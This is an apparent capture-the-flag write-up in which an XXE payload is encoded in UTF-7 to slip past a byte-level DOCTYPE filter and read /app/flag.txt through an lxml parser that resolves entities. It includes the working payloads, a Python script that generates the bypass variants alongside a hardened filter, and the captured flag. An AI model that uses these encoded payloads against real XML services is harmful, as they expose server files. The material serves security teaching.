Mater Flag


IP

  • http://<username>.playat.flagyard.com

The challenge presents a simple UI that more or less works.

It rejects anything other than numeric input, though.

Let's look at the challenge code.

TIP: Let's break it down step by step.

Vulnerable code (excerpt)

```python
from lxml import etree

def parse_measurements(xml_data: bytes):
    # crude filter on the raw request bytes:
    if b"<!DOCTYPE" in xml_data or b"+ADwAIQ-ENTITY" in xml_data:
        return "I'm watching you *-*"
    parser = etree.XMLParser(resolve_entities=True)  # entities declared in a DTD get expanded
    doc = etree.fromstring(xml_data, parser)
    return doc
```

resolve_entities=True tells lxml to expand entities declared in the DTD, including external ones that point at local files. The filter, on the other hand, runs on the raw request bytes and looks only for two exact strings: <!DOCTYPE and +ADwAIQ-ENTITY (the latter is <!ENTITY in standard UTF-7). Anything the parser decodes into those keywords by another route gets past it.

Proof of Concept (PoC). Goal: read /app/flag.txt and have its content reflected in the XML response.

Why this works: lxml expands declared entities when resolve_entities=True. The app echoes the <weight> and <height> values back in the response XML, so referencing the entity (&xxe;) inside <weight> puts the file content into the returned document.

First attempt (plain ASCII payload). Note: the filter looks for the exact bytes <!DOCTYPE, and XML gives us no wiggle room here: the keyword is case-sensitive and no whitespace is allowed between <! and DOCTYPE, so a naive payload will hit the filter as written.

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///app/flag.txt">]>
<data><weight>&xxe;</weight><height>156</height></data>
```


The request is rejected: the filter catches the literal <!DOCTYPE. Looking at the source code again, the check runs on the raw request bytes, while the parser first decodes the document according to the encoding named in the XML declaration.

So we can encode the payload as UTF-7 in CyberChef and send that instead. The XML declaration stays in ASCII so the parser can read encoding="UTF-7"; everything after it is shifted, so the bytes <!DOCTYPE never appear in the request. The filter also denylists +ADwAIQ-ENTITY, the standard UTF-7 spelling of <!ENTITY, but the encoded payload below spells < and ! as separate runs (+ADw-+ACE-), which is equally valid UTF-7 and not on the denylist.

Payload after encoding:

```xml
<?xml version="1.0" encoding="UTF-7"?>+ADw-+ACE-DOCTYPE+ACA-replace+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-ent+ACA-SYSTEM+ACA-+ACI-file:///app/flag.txt+ACI-+AD4-+ACA-+AF0-+AD4-+AA0-+AAo-+ADw-data+AD4-+ADw-weight+AD4-+ACY-ent+ADs-+ADw-/weight+AD4-+ADw-height+AD4-156+ADw-/height+AD4-+ADw-/data+AD4-
```
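To make the bypass concrete, here is an added example (stdlib-only Python written for this page, not code from the writeup or the challenge). It reimplements the challenge's byte filter, builds the same DOCTYPE payload in two valid UTF-7 spellings (grouped runs, which produce the denylisted +ADwAIQ-ENTITY, and one run per character, as in the payload above), decodes the writeup's payload to show what the parser actually saw, and contrasts the byte filter with a check that decodes first. The DOCTYPE layout on separate lines, the function names, and the hardened_filter helper are choices made here, not taken from the challenge.

```python
import base64
import re


# The challenge's filter as excerpted in the writeup. True means the request is rejected.
def crude_filter(xml_data: bytes) -> bool:
    return b"<!DOCTYPE" in xml_data or b"+ADwAIQ-ENTITY" in xml_data


def utf7_run(chars: str) -> bytes:
    """One UTF-7 shifted run '+...-' covering every character in `chars`
    (UTF-16BE, base64, padding stripped): '<' -> b'+ADw-', '<!' -> b'+ADwAIQ-'."""
    return b"+" + base64.b64encode(chars.encode("utf-16-be")).rstrip(b"=") + b"-"


# Characters left unencoded: RFC 2152 "Set D" plus whitespace. Everything else,
# including the XML metacharacters < ! > [ ] " & ;, goes into a shifted run.
_DIRECT = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'(),-./:? \t\r\n")


def utf7_encode(text: str, split_runs: bool) -> bytes:
    """Encode `text` as UTF-7 in one of two valid spellings.
    split_runs=False: adjacent specials share a run, so '<!' becomes '+ADwAIQ-'
                      (the spelling the filter denylists).
    split_runs=True:  one run per character, so '<!' becomes '+ADw-+ACE-'
                      (the spelling used by the payload in the writeup).
    Both decode to exactly `text`."""
    out, pending = bytearray(), ""
    for ch in text:
        if ch in _DIRECT:
            if pending:
                out += utf7_run(pending)
                pending = ""
            out += ch.encode("ascii")
        elif split_runs:
            out += utf7_run(ch)
        else:
            pending += ch
    if pending:
        out += utf7_run(pending)
    return bytes(out)


# The XML declaration must stay ASCII: the parser reads encoding="..." from it before
# switching decoders. Entity name, file path and element names follow the writeup; the
# DOCTYPE is laid out on separate lines here (a layout chosen for this example).
XML_DECL = b'<?xml version="1.0" encoding="UTF-7"?>'
BODY = (
    '<!DOCTYPE replace [\n'
    '<!ENTITY ent SYSTEM "file:///app/flag.txt">\n'
    ']>\n'
    '<data><weight>&ent;</weight><height>156</height></data>'
)


def build_request(split_runs: bool) -> bytes:
    return XML_DECL + utf7_encode(BODY, split_runs=split_runs)


def declared_encoding(xml_data: bytes) -> str:
    """Encoding named in the XML declaration, defaulting to UTF-8 as the XML spec does."""
    m = re.match(rb'<\?xml[^?]*encoding=["\']([^"\']+)["\']', xml_data)
    return m.group(1).decode("ascii") if m else "utf-8"


def parser_view(xml_data: bytes) -> str:
    """The text an XML parser works on after honouring the declared encoding.
    Python's codecs stand in for libxml2's decoder here; the decoded text is the same."""
    return xml_data.decode(declared_encoding(xml_data))


def hardened_filter(xml_data: bytes) -> bool:
    """Check the decoded document, not the raw bytes: accept only UTF-8 and reject any
    DOCTYPE after decoding. This is defence in depth; what actually closes XXE is parsing
    with entity resolution off (lxml: XMLParser(resolve_entities=False, load_dtd=False,
    no_network=True))."""
    if declared_encoding(xml_data).lower() != "utf-8":
        return True
    try:
        text = xml_data.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return "<!DOCTYPE" in text


# The writeup's payload, verbatim, so parser_view() can show what the server parsed.
PAGE_PAYLOAD = (
    b'<?xml version="1.0" encoding="UTF-7"?>+ADw-+ACE-DOCTYPE+ACA-replace+ACA-+AFs-'
    b'+ADw-+ACE-ENTITY+ACA-ent+ACA-SYSTEM+ACA-+ACI-file:///app/flag.txt+ACI-+AD4-'
    b'+ACA-+AF0-+AD4-+AA0-+AAo-+ADw-data+AD4-+ADw-weight+AD4-+ACY-ent+ADs-'
    b'+ADw-/weight+AD4-+ADw-height+AD4-156+ADw-/height+AD4-+ADw-/data+AD4-'
)

if __name__ == "__main__":
    for split in (False, True):
        label = "one run per character" if split else "grouped runs"
        print(f"{label}: blocked by crude filter = {crude_filter(build_request(split))}")
    print(parser_view(PAGE_PAYLOAD))
```

Running it shows the grouped spelling is blocked (it contains +ADwAIQ-ENTITY) while the per-character spelling passes, yet both decode to the identical DOCTYPE; hardened_filter rejects every variant because it inspects the document the way the parser will read it, and refuses encodings the application has no reason to accept.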

We got the flag:

```text
FlagY{c064bc53c601d52499ef381f5b5caabd}
```

Challenge complete.